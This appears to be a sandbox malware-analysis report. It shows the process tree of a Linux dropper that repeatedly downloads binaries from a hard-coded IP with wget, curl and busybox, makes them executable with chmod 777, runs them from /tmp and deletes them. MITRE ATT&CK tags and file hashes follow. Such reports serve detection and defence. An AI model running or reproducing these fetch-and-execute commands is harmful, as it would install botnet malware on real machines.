/bin/rmrm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:1653
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:1654
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:1656
-
-
/bin/chmodchmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:1659
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:1662
-
-
/bin/chmodchmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:1665
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:1668
-
-
/bin/chmodchmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:1671
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:1674
-
-
/bin/chmodchmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:1677
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:1678
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1679
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:1680
-
-
/bin/chmodchmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1682
-
-
/bin/rmrm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:1683
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:1684
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Writes file to tmp directory
PID:1685
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:1686
-
-
/bin/chmodchmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- File and Directory Permissions Modification
PID:1687
-
-
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Executes dropped EXE
PID:1688
-
-
/bin/rmrm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:1689
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97